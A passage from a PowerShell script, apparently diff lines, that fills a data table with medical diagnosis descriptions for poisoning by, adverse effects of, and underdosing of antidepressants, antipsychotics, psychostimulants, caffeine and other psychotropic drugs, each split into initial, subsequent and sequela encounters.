(unintentional)","Poisoning by selective serotonin reuptake inhibitors, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by selective serotonin reuptake inhibitors, intentional self-harm","Poisoning by selective serotonin reuptake inhibitors, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by selective serotonin reuptake inhibitors, intentional self-harm","Poisoning by selective serotonin reuptake inhibitors, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by selective serotonin reuptake inhibitors, intentional self-harm","Poisoning by selective serotonin reuptake inhibitors, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by selective serotonin reuptake inhibitors, assault","Poisoning by selective serotonin reuptake inhibitors, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by selective serotonin reuptake inhibitors, assault","Poisoning by selective serotonin reuptake inhibitors, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by selective serotonin reuptake inhibitors, assault","Poisoning by selective serotonin reuptake inhibitors, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by selective serotonin reuptake inhibitors, undetermined","Poisoning by selective serotonin reuptake inhibitors, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by selective serotonin reuptake inhibitors, undetermined","Poisoning by selective serotonin reuptake inhibitors, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by selective serotonin reuptake inhibitors, undetermined","Poisoning by selective serotonin reuptake inhibitors, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of selective serotonin reuptake inhibitors","Adverse effect of selective serotonin reuptake inhibitors, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of selective serotonin reuptake inhibitors","Adverse effect of selective serotonin reuptake inhibitors, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of selective serotonin reuptake inhibitors","Adverse effect of selective serotonin reuptake inhibitors, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of selective serotonin reuptake inhibitors","Underdosing of selective serotonin reuptake inhibitors, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of selective serotonin reuptake inhibitors","Underdosing of selective serotonin reuptake inhibitors, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of selective serotonin reuptake inhibitors","Underdosing of selective serotonin reuptake inhibitors, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other antidepressants, accidental (unintentional)","Poisoning by other antidepressants, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other antidepressants, accidental (unintentional)","Poisoning by other antidepressants, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other antidepressants, accidental (unintentional)","Poisoning by other antidepressants, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other antidepressants, intentional self-harm","Poisoning by other antidepressants, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other antidepressants, intentional self-harm","Poisoning by other antidepressants, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other antidepressants, intentional self-harm","Poisoning by other antidepressants, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other antidepressants, assault","Poisoning by other antidepressants, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other antidepressants, assault","Poisoning by other antidepressants, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other antidepressants, assault","Poisoning by other antidepressants, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other antidepressants, undetermined","Poisoning by other antidepressants, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other antidepressants, undetermined","Poisoning by other antidepressants, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other antidepressants, undetermined","Poisoning by other antidepressants, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of other antidepressants","Adverse effect of other antidepressants, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of other antidepressants","Adverse effect of other antidepressants, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of other antidepressants","Adverse effect of other antidepressants, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of other antidepressants","Underdosing of other antidepressants, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of other antidepressants","Underdosing of other antidepressants, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of other antidepressants","Underdosing of other antidepressants, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by phenothiazine antipsychotics and neuroleptics, accidental (unintentional)","Poisoning by phenothiazine antipsychotics and neuroleptics, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by phenothiazine antipsychotics and neuroleptics, accidental (unintentional)","Poisoning by phenothiazine antipsychotics and neuroleptics, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by phenothiazine antipsychotics and neuroleptics, accidental (unintentional)","Poisoning by phenothiazine antipsychotics and neuroleptics, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by phenothiazine antipsychotics and neuroleptics, intentional self-harm","Poisoning by phenothiazine antipsychotics and neuroleptics, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by phenothiazine antipsychotics and neuroleptics, intentional self-harm","Poisoning by phenothiazine antipsychotics and neuroleptics, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by phenothiazine antipsychotics and neuroleptics, intentional self-harm","Poisoning by phenothiazine antipsychotics and neuroleptics, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by phenothiazine antipsychotics and neuroleptics, assault","Poisoning by phenothiazine antipsychotics and neuroleptics, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by phenothiazine antipsychotics and neuroleptics, assault","Poisoning by phenothiazine antipsychotics and neuroleptics, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by phenothiazine antipsychotics and neuroleptics, assault","Poisoning by phenothiazine antipsychotics and neuroleptics, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by phenothiazine antipsychotics and neuroleptics, undetermined","Poisoning by phenothiazine antipsychotics and neuroleptics, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by phenothiazine antipsychotics and neuroleptics, undetermined","Poisoning by phenothiazine antipsychotics and neuroleptics, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by phenothiazine antipsychotics and neuroleptics, undetermined","Poisoning by phenothiazine antipsychotics and neuroleptics, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of phenothiazine antipsychotics and neuroleptics","Adverse effect of phenothiazine antipsychotics and neuroleptics, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of phenothiazine antipsychotics and neuroleptics","Adverse effect of phenothiazine antipsychotics and neuroleptics, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of phenothiazine antipsychotics and neuroleptics","Adverse effect of phenothiazine antipsychotics and neuroleptics, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of phenothiazine antipsychotics and neuroleptics","Underdosing of phenothiazine antipsychotics and neuroleptics, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of phenothiazine antipsychotics and neuroleptics","Underdosing of phenothiazine antipsychotics and neuroleptics, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of phenothiazine antipsychotics and neuroleptics","Underdosing of phenothiazine antipsychotics and neuroleptics, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by butyrophenone and thiothixene neuroleptics, accidental (unintentional)","Poisoning by butyrophenone and thiothixene neuroleptics, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by butyrophenone and thiothixene neuroleptics, accidental (unintentional)","Poisoning by butyrophenone and thiothixene neuroleptics, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by butyrophenone and thiothixene neuroleptics, accidental (unintentional)","Poisoning by butyrophenone and thiothixene neuroleptics, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by butyrophenone and thiothixene neuroleptics, intentional self-harm","Poisoning by butyrophenone and thiothixene neuroleptics, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by butyrophenone and thiothixene neuroleptics, intentional self-harm","Poisoning by butyrophenone and thiothixene neuroleptics, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by butyrophenone and thiothixene neuroleptics, intentional self-harm","Poisoning by butyrophenone and thiothixene neuroleptics, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by butyrophenone and thiothixene neuroleptics, assault","Poisoning by butyrophenone and thiothixene neuroleptics, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by butyrophenone and thiothixene neuroleptics, assault","Poisoning by butyrophenone and thiothixene neuroleptics, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by butyrophenone and thiothixene neuroleptics, assault","Poisoning by butyrophenone and thiothixene neuroleptics, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by butyrophenone and thiothixene neuroleptics, undetermined","Poisoning by butyrophenone and thiothixene neuroleptics, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by butyrophenone and thiothixene neuroleptics, undetermined","Poisoning by butyrophenone and thiothixene neuroleptics, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by butyrophenone and thiothixene neuroleptics, undetermined","Poisoning by butyrophenone and thiothixene neuroleptics, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of butyrophenone and thiothixene neuroleptics","Adverse effect of butyrophenone and thiothixene neuroleptics, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of butyrophenone and thiothixene neuroleptics","Adverse effect of butyrophenone and thiothixene neuroleptics, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of butyrophenone and thiothixene neuroleptics","Adverse effect of butyrophenone and thiothixene neuroleptics, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of butyrophenone and thiothixene neuroleptics","Underdosing of butyrophenone and thiothixene neuroleptics, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of butyrophenone and thiothixene neuroleptics","Underdosing of butyrophenone and thiothixene neuroleptics, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of butyrophenone and thiothixene neuroleptics","Underdosing of butyrophenone and thiothixene neuroleptics, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified antipsychotics and neuroleptics, accidental (unintentional)","Poisoning by unspecified antipsychotics and neuroleptics, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified antipsychotics and neuroleptics, accidental (unintentional)","Poisoning by unspecified antipsychotics and neuroleptics, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified antipsychotics and neuroleptics, accidental (unintentional)","Poisoning by unspecified antipsychotics and neuroleptics, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified antipsychotics and neuroleptics, intentional self-harm","Poisoning by unspecified antipsychotics and neuroleptics, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified antipsychotics and neuroleptics, intentional self-harm","Poisoning by unspecified antipsychotics and neuroleptics, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified antipsychotics and neuroleptics, intentional self-harm","Poisoning by unspecified antipsychotics and neuroleptics, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified antipsychotics and neuroleptics, assault","Poisoning by unspecified antipsychotics and neuroleptics, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified antipsychotics and neuroleptics, assault","Poisoning by unspecified antipsychotics and neuroleptics, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified antipsychotics and neuroleptics, assault","Poisoning by unspecified antipsychotics and neuroleptics, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified antipsychotics and neuroleptics, undetermined","Poisoning by unspecified antipsychotics and neuroleptics, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified antipsychotics and neuroleptics, undetermined","Poisoning by unspecified antipsychotics and neuroleptics, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified antipsychotics and neuroleptics, undetermined","Poisoning by unspecified antipsychotics and neuroleptics, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of unspecified antipsychotics and neuroleptics","Adverse effect of unspecified antipsychotics and neuroleptics, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of unspecified antipsychotics and neuroleptics","Adverse effect of unspecified antipsychotics and neuroleptics, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of unspecified antipsychotics and neuroleptics","Adverse effect of unspecified antipsychotics and neuroleptics, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of unspecified antipsychotics and neuroleptics","Underdosing of unspecified antipsychotics and neuroleptics, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of unspecified antipsychotics and neuroleptics","Underdosing of unspecified antipsychotics and neuroleptics, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of unspecified antipsychotics and neuroleptics","Underdosing of unspecified antipsychotics and neuroleptics, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other antipsychotics and neuroleptics, accidental (unintentional)","Poisoning by other antipsychotics and neuroleptics, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other antipsychotics and neuroleptics, accidental (unintentional)","Poisoning by other antipsychotics and neuroleptics, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other antipsychotics and neuroleptics, accidental (unintentional)","Poisoning by other antipsychotics and neuroleptics, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other antipsychotics and neuroleptics, intentional self-harm","Poisoning by other antipsychotics and neuroleptics, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other antipsychotics and neuroleptics, intentional self-harm","Poisoning by other antipsychotics and neuroleptics, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other antipsychotics and neuroleptics, intentional self-harm","Poisoning by other antipsychotics and neuroleptics, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other antipsychotics and neuroleptics, assault","Poisoning by other antipsychotics and neuroleptics, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other antipsychotics and neuroleptics, assault","Poisoning by other antipsychotics and neuroleptics, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other antipsychotics and neuroleptics, assault","Poisoning by other antipsychotics and neuroleptics, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other antipsychotics and neuroleptics, undetermined","Poisoning by other antipsychotics and neuroleptics, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other antipsychotics and neuroleptics, undetermined","Poisoning by other antipsychotics and neuroleptics, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other antipsychotics and neuroleptics, undetermined","Poisoning by other antipsychotics and neuroleptics, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of other antipsychotics and neuroleptics","Adverse effect of other antipsychotics and neuroleptics, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of other antipsychotics and neuroleptics","Adverse effect of other antipsychotics and neuroleptics, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of other antipsychotics and neuroleptics","Adverse effect of other antipsychotics and neuroleptics, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of other antipsychotics and neuroleptics","Underdosing of other antipsychotics and neuroleptics, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of other antipsychotics and neuroleptics","Underdosing of other antipsychotics and neuroleptics, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of other antipsychotics and neuroleptics","Underdosing of other antipsychotics and neuroleptics, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified psychostimulants, accidental (unintentional)","Poisoning by unspecified psychostimulants, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified psychostimulants, accidental (unintentional)","Poisoning by unspecified psychostimulants, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified psychostimulants, accidental (unintentional)","Poisoning by unspecified psychostimulants, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified psychostimulants, intentional self-harm","Poisoning by unspecified psychostimulants, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified psychostimulants, intentional self-harm","Poisoning by unspecified psychostimulants, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified psychostimulants, intentional self-harm","Poisoning by unspecified psychostimulants, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified psychostimulants, assault","Poisoning by unspecified psychostimulants, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified psychostimulants, assault","Poisoning by unspecified psychostimulants, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified psychostimulants, assault","Poisoning by unspecified psychostimulants, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified psychostimulants, undetermined","Poisoning by unspecified psychostimulants, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified psychostimulants, undetermined","Poisoning by unspecified psychostimulants, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified psychostimulants, undetermined","Poisoning by unspecified psychostimulants, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of unspecified psychostimulants","Adverse effect of unspecified psychostimulants, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of unspecified psychostimulants","Adverse effect of unspecified psychostimulants, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of unspecified psychostimulants","Adverse effect of unspecified psychostimulants, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of unspecified psychostimulants","Underdosing of unspecified psychostimulants, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of unspecified psychostimulants","Underdosing of unspecified psychostimulants, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of unspecified psychostimulants","Underdosing of unspecified psychostimulants, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by caffeine, accidental (unintentional)","Poisoning by caffeine, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by caffeine, accidental (unintentional)","Poisoning by caffeine, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by caffeine, accidental (unintentional)","Poisoning by caffeine, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by caffeine, intentional self-harm","Poisoning by caffeine, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by caffeine, intentional self-harm","Poisoning by caffeine, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by caffeine, intentional self-harm","Poisoning by caffeine, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by caffeine, assault","Poisoning by caffeine, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by caffeine, assault","Poisoning by caffeine, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by caffeine, assault","Poisoning by caffeine, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by caffeine, undetermined","Poisoning by caffeine, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by caffeine, undetermined","Poisoning by caffeine, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by caffeine, undetermined","Poisoning by caffeine, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of caffeine","Adverse effect of caffeine, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of caffeine","Adverse effect of caffeine, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of caffeine","Adverse effect of caffeine, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of caffeine","Underdosing of caffeine, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of caffeine","Underdosing of caffeine, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of caffeine","Underdosing of caffeine, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by amphetamines, accidental (unintentional)","Poisoning by amphetamines, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by amphetamines, accidental (unintentional)","Poisoning by amphetamines, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by amphetamines, accidental (unintentional)","Poisoning by amphetamines, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by amphetamines, intentional self-harm","Poisoning by amphetamines, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by amphetamines, intentional self-harm","Poisoning by amphetamines, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by amphetamines, intentional self-harm","Poisoning by amphetamines, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by amphetamines, assault","Poisoning by amphetamines, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by amphetamines, assault","Poisoning by amphetamines, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by amphetamines, assault","Poisoning by amphetamines, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by amphetamines, undetermined","Poisoning by amphetamines, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by amphetamines, undetermined","Poisoning by amphetamines, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by amphetamines, undetermined","Poisoning by amphetamines, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of amphetamines","Adverse effect of amphetamines, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of amphetamines","Adverse effect of amphetamines, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of amphetamines","Adverse effect of amphetamines, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of amphetamines","Underdosing of amphetamines, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of amphetamines","Underdosing of amphetamines, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of amphetamines","Underdosing of amphetamines, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by methylphenidate, accidental (unintentional)","Poisoning by methylphenidate, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by methylphenidate, accidental (unintentional)","Poisoning by methylphenidate, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by methylphenidate, accidental (unintentional)","Poisoning by methylphenidate, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by methylphenidate, intentional self-harm","Poisoning by methylphenidate, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by methylphenidate, intentional self-harm","Poisoning by methylphenidate, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by methylphenidate, intentional self-harm","Poisoning by methylphenidate, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by methylphenidate, assault","Poisoning by methylphenidate, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by methylphenidate, assault","Poisoning by methylphenidate, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by methylphenidate, assault","Poisoning by methylphenidate, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by methylphenidate, undetermined","Poisoning by methylphenidate, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by methylphenidate, undetermined","Poisoning by methylphenidate, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by methylphenidate, undetermined","Poisoning by methylphenidate, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of methylphenidate","Adverse effect of methylphenidate, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of methylphenidate","Adverse effect of methylphenidate, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of methylphenidate","Adverse effect of methylphenidate, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of methylphenidate","Underdosing of methylphenidate, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of methylphenidate","Underdosing of methylphenidate, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of methylphenidate","Underdosing of methylphenidate, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other psychostimulants, accidental (unintentional)","Poisoning by other psychostimulants, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other psychostimulants, accidental (unintentional)","Poisoning by other psychostimulants, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other psychostimulants, accidental (unintentional)","Poisoning by other psychostimulants, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other psychostimulants, intentional self-harm","Poisoning by other psychostimulants, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other psychostimulants, intentional self-harm","Poisoning by other psychostimulants, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other psychostimulants, intentional self-harm","Poisoning by other psychostimulants, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other psychostimulants, assault","Poisoning by other psychostimulants, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other psychostimulants, assault","Poisoning by other psychostimulants, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other psychostimulants, assault","Poisoning by other psychostimulants, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other psychostimulants, undetermined","Poisoning by other psychostimulants, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other psychostimulants, undetermined","Poisoning by other psychostimulants, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other psychostimulants, undetermined","Poisoning by other psychostimulants, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of other psychostimulants","Adverse effect of other psychostimulants, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of other psychostimulants","Adverse effect of other psychostimulants, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of other psychostimulants","Adverse effect of other psychostimulants, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of other psychostimulants","Underdosing of other psychostimulants, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of other psychostimulants","Underdosing of other psychostimulants, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of other psychostimulants","Underdosing of other psychostimulants, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other psychotropic drugs, accidental (unintentional)","Poisoning by other psychotropic drugs, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other psychotropic drugs, accidental (unintentional)","Poisoning by other psychotropic drugs, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other psychotropic drugs, accidental (unintentional)","Poisoning by other psychotropic drugs, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other psychotropic drugs, intentional self-harm","Poisoning by other psychotropic drugs, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other psychotropic drugs, intentional self-harm","Poisoning by other psychotropic drugs, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other psychotropic drugs, intentional self-harm","Poisoning by other psychotropic drugs, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other psychotropic drugs, assault","Poisoning by other psychotropic drugs, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other psychotropic drugs, assault","Poisoning by other psychotropic drugs, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other psychotropic drugs, assault","Poisoning by other psychotropic drugs, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other psychotropic drugs, undetermined","Poisoning by other psychotropic drugs, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other psychotropic drugs, undetermined","Poisoning by other psychotropic drugs, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other psychotropic drugs, undetermined","Poisoning by other psychotropic drugs, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of other psychotropic drugs","Adverse effect of other psychotropic drugs, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of other psychotropic drugs","Adverse effect of other psychotropic drugs, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of other psychotropic drugs","Adverse effect of other psychotropic drugs, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of other psychotropic drugs","Underdosing of other psychotropic drugs, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of other psychotropic drugs","Underdosing of other psychotropic drugs, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of other psychotropic drugs","Underdosing of other psychotropic drugs, 